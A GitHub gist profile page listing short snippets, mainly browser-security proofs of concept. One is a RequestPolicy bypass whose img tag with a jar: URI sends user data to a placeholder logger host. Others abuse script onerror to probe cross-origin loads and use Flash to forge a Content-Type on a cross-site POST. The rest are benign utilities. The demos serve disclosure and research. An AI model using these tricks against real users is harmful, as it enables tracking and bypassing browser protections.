Skip to content

Instantly share code, notes, and snippets.

View JordanMilne's full-sized avatar

Jordan Milne JordanMilne

64 followers · 2 following
  • Canada
View GitHub Profile
@JordanMilne
JordanMilne / gist:6459317
Created September 6, 2013 03:52
Demonstrates abuse of script error handling
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
@JordanMilne
JordanMilne / gist:7704136
Created November 29, 2013 10:48
Demonstration of a RequestPolicy bypass using jar: URIs
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
@JordanMilne
JordanMilne / gist:8032399
Created December 19, 2013 00:40
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
@JordanMilne
JordanMilne / content-type.mxml
Created January 16, 2014 21:09
setting the Content-Type header with flash
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
@JordanMilne
JordanMilne / gist:0880a229356b317f9ee0
Created July 7, 2014 07:36
JSON_HEX_TAGS-like functionality
>>> import simplejson
>>> print simplejson.dumps({"foo<>":"<>bar&"}, cls=simplejson.JSONEncoderForHTML)
{"foo\u003c\u003e": "\u003c\u003ebar\u0026"}
@JordanMilne
JordanMilne / gist:e9c6314d56e7f2fc649a
Last active August 29, 2015 14:06
LF
$ ./stmd --ast foo.md
document
paragraph
str "Normal paragraph"
paragraph
str "Paragraph 2"
paragraph
str "foo "
@JordanMilne
JordanMilne / keybase.md
Created September 26, 2014 00:40

Keybase proof

I hereby claim:

  • I am jordanmilne on github.
  • I am largenocream (https://keybase.io/largenocream) on keybase.
  • I have a public key whose fingerprint is D39D AEC8 56F2 2C2B A0ED BFC6 BADF 89BE FF6F 9ED3

To claim this, I am signing this object:

@JordanMilne
JordanMilne / pytaint.patch
Created October 21, 2014 03:28
pyenv-compatible patch for pytaint against python 2.7.5, see https://github.com/felixgr/pytaint
From 2aea5633663dd0b91d55a80a17ad22edfb23731f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Felix=20Gr=C3=B6bert?= <groebert@google.com>
Date: Mon, 7 Oct 2013 15:44:48 +0200
Subject: [PATCH 1/9] pytaint patch
---
Include/Python.h | 3 +
Include/meritobject.h | 28 +
Include/pyerrors.h | 1 +
Include/stringobject.h | 53 +-
@JordanMilne
JordanMilne / gist:04c161a5b66a087619ed
Created October 28, 2014 18:05
Support HTTPS forcing in PRAW 2
import praw
from functools import wraps
def init_wrapper(func):
@wraps(func)
def func_wrapper(*args, **kwargs):
ret = func(*args, **kwargs)
if ret:
ret._site_url = ret._site_url.replace('http:', 'https:')
ret._short_domain = ret._site_url.replace('http:', 'https:')
@JordanMilne
JordanMilne / find-broken.sh
Created November 4, 2014 21:20
Horrible scripts to make JD's output recompileable (for Spiral Knights, circa 2011. I'm not allowed regexes anymore.)
#!/bin/bash
#find possibly broken source files that will need to be manually fixed
( \
find ../code -type f -iname "*.java" -print0 | xargs --null grep -l '// Byte code:' && \
find ../code -type f -iname "*.java" -size 0 \
) | uniq